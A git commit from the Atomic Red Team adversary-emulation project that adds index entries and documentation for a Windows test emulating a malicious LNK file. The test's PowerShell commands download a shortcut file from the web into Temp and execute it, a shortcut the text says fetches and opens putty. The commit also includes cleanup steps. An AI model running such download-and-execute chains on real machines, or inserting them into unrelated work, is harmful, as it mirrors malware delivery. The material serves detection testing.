security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-05-06 04:43:44 +00:00
parent 5f77bdd0c5
commit a5ca285de1
6 changed files with 64 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -1024,6 +1024,7 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1024 execution T1204.002 Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
1025 execution T1204.002 Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
1026 execution T1204.002 Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
1027 execution T1204.002 Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
1028 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
1029 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
1030 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -743,6 +743,7 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
743 execution T1204.002 Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
744 execution T1204.002 Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
745 execution T1204.002 Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
746 execution T1204.002 Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
747 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
748 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
749 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -1673,6 +1673,7 @@
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1106 Native API](../../T1106/T1106.md)
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -1220,6 +1220,7 @@
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
atomics/Indexes/index.yaml
+19
View File
@@ -68868,6 +68868,25 @@ execution:
-ErrorAction Ignore
'
- name: LNK Payload Download
auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f
description: This lnk files invokes powershell to download putty from the internet
and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
supported_platforms:
- windows
executor:
command: |
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
$file1 = "$env:Temp\test10.lnk"
Start-Process $file1
Start-Sleep -s 10
taskkill /IM a.exe /F
cleanup_command: |-
$file1 = "$env:Temp\test10.lnk"
$file2 = "$env:Temp\a.exe"
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore
name: powershell
T1204.003:
technique:
object_marking_refs:
atomics/T1204.002/T1204.002.md
+41
View File
@@ -26,6 +26,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #9 - Office Generic Payload Download](#atomic-test-9---office-generic-payload-download)
- [Atomic Test #10 - LNK Payload Download](#atomic-test-10---lnk-payload-download)
<br/>
@@ -584,4 +586,43 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
<br/>
<br/>
## Atomic Test #10 - LNK Payload Download
This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
**Supported Platforms:** Windows
**auto_generated_guid:** 581d7521-9c4b-420e-9695-2aec5241167f
#### Attack Commands: Run with `powershell`!
```powershell
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
$file1 = "$env:Temp\test10.lnk"
Start-Process $file1
Start-Sleep -s 10
taskkill /IM a.exe /F
```
#### Cleanup Commands:
```powershell
$file1 = "$env:Temp\test10.lnk"
$file2 = "$env:Temp\a.exe"
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore
```
<br/>